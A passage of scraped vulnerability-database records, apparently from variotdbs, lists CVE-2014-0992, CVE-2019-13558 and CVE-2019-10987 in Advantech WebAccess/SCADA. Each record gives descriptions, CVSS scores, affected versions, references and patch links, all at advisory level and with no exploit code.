"https://github.com/coresecurity/sentinel." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0991" }, { "trust": 0.1, "url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0990" }, { "trust": 0.1, "url": "http://corelabs.coresecurity.com." }, { "trust": 0.1, "url": "http://webaccess.advantech.com/downloads_software.php" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0986" }, { "trust": 0.1, "url": "http://support.microsoft.com/kb/2458544." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0985" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-05416" }, { "db": "VULHUB", "id": "VHN-68485" }, { "db": "VULMON", "id": "CVE-2014-0992" }, { "db": "JVNDB", "id": "JVNDB-2014-004359" }, { "db": "PACKETSTORM", "id": "128120" }, { "db": "CNNVD", "id": "CNNVD-201409-739" }, { "db": "NVD", "id": "CVE-2014-0992" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "d2889864-2351-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "37943294-1ec1-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05416" }, { "db": "VULHUB", "id": "VHN-68485" }, { "db": "VULMON", "id": "CVE-2014-0992" }, { "db": "BID", "id": "69538" }, { "db": "JVNDB", "id": "JVNDB-2014-004359" }, { "db": "PACKETSTORM", "id": "128120" }, { "db": "CNNVD", "id": "CNNVD-201409-739" }, { "db": "NVD", "id": "CVE-2014-0992" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-09-05T00:00:00", "db": "IVD", "id": "d2889864-2351-11e6-abef-000c29c66e3d" }, { "date": "2014-09-05T00:00:00", "db": "IVD", "id": "37943294-1ec1-11e6-abef-000c29c66e3d" }, { "date": "2014-09-05T00:00:00", "db": "CNVD", "id": "CNVD-2014-05416" }, { "date": "2014-09-20T00:00:00", "db": "VULHUB", "id": "VHN-68485" }, { "date": "2014-09-20T00:00:00", "db": "VULMON", "id": "CVE-2014-0992" }, { "date": "2014-09-02T00:00:00", "db": "BID", "id": "69538" }, { "date": "2014-09-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-004359" }, { "date": "2014-09-02T22:28:11", "db": "PACKETSTORM", "id": "128120" }, { "date": "2014-09-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201409-739" }, { "date": "2014-09-20T10:55:04.247000", "db": "NVD", "id": "CVE-2014-0992" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-12-29T00:00:00", "db": "CNVD", "id": "CNVD-2014-05416" }, { "date": "2015-08-05T00:00:00", "db": "VULHUB", "id": "VHN-68485" }, { "date": "2015-08-05T00:00:00", "db": "VULMON", "id": "CVE-2014-0992" }, { "date": "2014-09-22T18:05:00", "db": "BID", "id": "69538" }, { "date": "2014-09-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-004359" }, { "date": "2014-09-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201409-739" }, { "date": "2024-11-21T02:03:10.760000", "db": "NVD", "id": "CVE-2014-0992" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201409-739" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Vulnerable to stack-based buffer overflow", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-004359" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "d2889864-2351-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "37943294-1ec1-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201409-739" } ], "trust": 1.0 } }
var-201909-0990
Vulnerability from variot
In WebAccess versions 8.4.1 and prior, an exploit executed over the network may cause improper control of generation of code, which may allow remote code execution, data exfiltration, or cause a system crash. WebAccess Contains a code injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a set of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201909-0990", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.4.1" }, { "model": "webaccess", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.4.1" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "7.2-2014.01.24" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "7.2-2013.11.14" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "7.2-2013.11.01" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "7.2-2014.01.20" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "7.2-2013.10.30" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "6.0-2008.05.15" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "7.2-2013.12.15" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "7.2-2013.10.24" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "7.2-2014.01.10" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "7.2-2013.10.28" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "20b1247f-1646-4108-bc5a-96d773650351" }, { "db": "CNVD", "id": "CNVD-2019-32467" }, { "db": "JVNDB", "id": "JVNDB-2019-009492" }, { "db": "CNNVD", "id": "CNNVD-201909-843" }, { "db": "NVD", "id": "CVE-2019-13558" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-009492" } ] }, "cve": "CVE-2019-13558", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2019-13558", "impactScore": 8.5, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2019-32467", "impactScore": 8.5, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "20b1247f-1646-4108-bc5a-96d773650351", "impactScore": 8.5, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-145416", "impactScore": 8.5, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2019-13558", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 9.8, "baseSeverity": "Critical", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2019-13558", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2019-13558", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2019-13558", "trust": 0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2019-32467", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201909-843", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "20b1247f-1646-4108-bc5a-96d773650351", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-145416", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "20b1247f-1646-4108-bc5a-96d773650351" }, { "db": "CNVD", "id": "CNVD-2019-32467" }, { "db": "VULHUB", "id": "VHN-145416" }, { "db": "JVNDB", "id": "JVNDB-2019-009492" }, { "db": "CNNVD", "id": "CNNVD-201909-843" }, { "db": "NVD", "id": "CVE-2019-13558" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "In WebAccess versions 8.4.1 and prior, an exploit executed over the network may cause improper control of generation of code, which may allow remote code execution, data exfiltration, or cause a system crash. WebAccess Contains a code injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a set of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment", "sources": [ { "db": "NVD", "id": "CVE-2019-13558" }, { "db": "JVNDB", "id": "JVNDB-2019-009492" }, { "db": "CNVD", "id": "CNVD-2019-32467" }, { "db": "IVD", "id": "20b1247f-1646-4108-bc5a-96d773650351" }, { "db": "VULHUB", "id": "VHN-145416" } ], "trust": 2.43 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2019-13558", "trust": 3.3 }, { "db": "ICS CERT", "id": "ICSA-19-260-01", "trust": 3.1 }, { "db": "CNNVD", "id": "CNNVD-201909-843", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2019-32467", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2019-009492", "trust": 0.8 }, { "db": "AUSCERT", "id": "ESB-2019.3558", "trust": 0.6 }, { "db": "IVD", "id": "20B1247F-1646-4108-BC5A-96D773650351", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-145416", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "20b1247f-1646-4108-bc5a-96d773650351" }, { "db": "CNVD", "id": "CNVD-2019-32467" }, { "db": "VULHUB", "id": "VHN-145416" }, { "db": "JVNDB", "id": "JVNDB-2019-009492" }, { "db": "CNNVD", "id": "CNNVD-201909-843" }, { "db": "NVD", "id": "CVE-2019-13558" } ] }, "id": "VAR-201909-0990", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "20b1247f-1646-4108-bc5a-96d773650351" }, { "db": "CNVD", "id": "CNVD-2019-32467" }, { "db": "VULHUB", "id": "VHN-145416" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "20b1247f-1646-4108-bc5a-96d773650351" }, { "db": "CNVD", "id": "CNVD-2019-32467" } ] }, "last_update_date": "2024-11-23T22:48:14.573000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "https://www.advantech.co.jp/industrial-automation/webaccess" }, { "title": "Advantech WebAccess code injection vulnerability patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/181505" }, { "title": "Advantech WebAccess Fixes for code injection vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=98371" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2019-32467" }, { "db": "JVNDB", "id": "JVNDB-2019-009492" }, { "db": "CNNVD", "id": "CNNVD-201909-843" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-94", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-145416" }, { "db": "JVNDB", "id": "JVNDB-2019-009492" }, { "db": "NVD", "id": "CVE-2019-13558" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.1, "url": "https://www.us-cert.gov/ics/advisories/icsa-19-260-01" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13558" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-13558" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.3558/" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2019-32467" }, { "db": "VULHUB", "id": "VHN-145416" }, { "db": "JVNDB", "id": "JVNDB-2019-009492" }, { "db": "CNNVD", "id": "CNNVD-201909-843" }, { "db": "NVD", "id": "CVE-2019-13558" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "20b1247f-1646-4108-bc5a-96d773650351" }, { "db": "CNVD", "id": "CNVD-2019-32467" }, { "db": "VULHUB", "id": "VHN-145416" }, { "db": "JVNDB", "id": "JVNDB-2019-009492" }, { "db": "CNNVD", "id": "CNNVD-201909-843" }, { "db": "NVD", "id": "CVE-2019-13558" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-09-21T00:00:00", "db": "IVD", "id": "20b1247f-1646-4108-bc5a-96d773650351" }, { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32467" }, { "date": "2019-09-18T00:00:00", "db": "VULHUB", "id": "VHN-145416" }, { "date": "2019-09-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-009492" }, { "date": "2019-09-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201909-843" }, { "date": "2019-09-18T22:15:11.293000", "db": "NVD", "id": "CVE-2019-13558" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32467" }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-145416" }, { "date": "2019-09-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-009492" }, { "date": "2019-09-30T00:00:00", "db": "CNNVD", "id": "CNNVD-201909-843" }, { "date": "2024-11-21T04:25:09.050000", "db": "NVD", "id": "CVE-2019-13558" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201909-843" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Code injection vulnerability", "sources": [ { "db": "IVD", "id": "20b1247f-1646-4108-bc5a-96d773650351" }, { "db": "CNVD", "id": "CNVD-2019-32467" }, { "db": "CNNVD", "id": "CNNVD-201909-843" } ], "trust": 1.4 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Code injection", "sources": [ { "db": "IVD", "id": "20b1247f-1646-4108-bc5a-96d773650351" }, { "db": "CNNVD", "id": "CNNVD-201909-843" } ], "trust": 0.8 } }
var-201906-1026
Vulnerability from variot
In WebAccess/SCADA Versions 8.3.5 and prior, multiple out-of-bounds write vulnerabilities are caused by a lack of proper validation of the length of user-supplied data. Exploitation of these vulnerabilities may allow remote code execution. WebAccess/SCADA Contains an out-of-bounds vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Authentication is not required to exploit this vulnerability.The specific flaw exists within bwdraw.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess/SCADA is prone to the following security vulnerabilities: 1. A directory-traversal vulnerability 2. Multiple stack-based buffer-overflow vulnerabilities 3. Multiple heap-based buffer-overflow vulnerabilities 4. An information disclosure vulnerability 5. Multiple remote-code execution vulnerabilities An attacker can exploit these issues to execute arbitrary code in the context of the application, modify and delete files, use directory-traversal sequences (â??../â??) to retrieve arbitrary files, escalate privileges and perform certain unauthorized actions or obtain sensitive information. This may aid in further attacks. Advantech WebAccess/SCADA Versions 8.3.5 and prior versions are vulnerable. The vulnerability stems from the fact that the program does not correctly verify the length of the data provided by the user
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201906-1026", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.3.5" }, { "model": "webaccess", "scope": null, "trust": 1.4, "vendor": "advantech", "version": null }, { "model": "webaccess/scada", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.5" }, { "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3.5" }, { "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3.4" }, { "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3.2" }, { "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.0" }, { "model": "webaccess/scada", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.2" }, { "model": "webaccess/scada", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.4.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "2aed5df4-3281-48d2-b87e-b8691b4a4884" }, { "db": "ZDI", "id": "ZDI-19-584" }, { "db": "ZDI", "id": "ZDI-19-587" }, { "db": "CNVD", "id": "CNVD-2019-32471" }, { "db": "BID", "id": "108923" }, { "db": "JVNDB", "id": "JVNDB-2019-005815" }, { "db": "NVD", "id": "CVE-2019-10987" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-005815" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Mat Powell of Trend Micro Zero Day Initiative", "sources": [ { "db": "ZDI", "id": "ZDI-19-584" } ], "trust": 0.7 }, "cve": "CVE-2019-10987", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2019-10987", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CNVD-2019-32471", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "2aed5df4-3281-48d2-b87e-b8691b4a4884", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-142588", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.8, "id": "CVE-2019-10987", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 8.8, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2019-10987", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "Required", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": 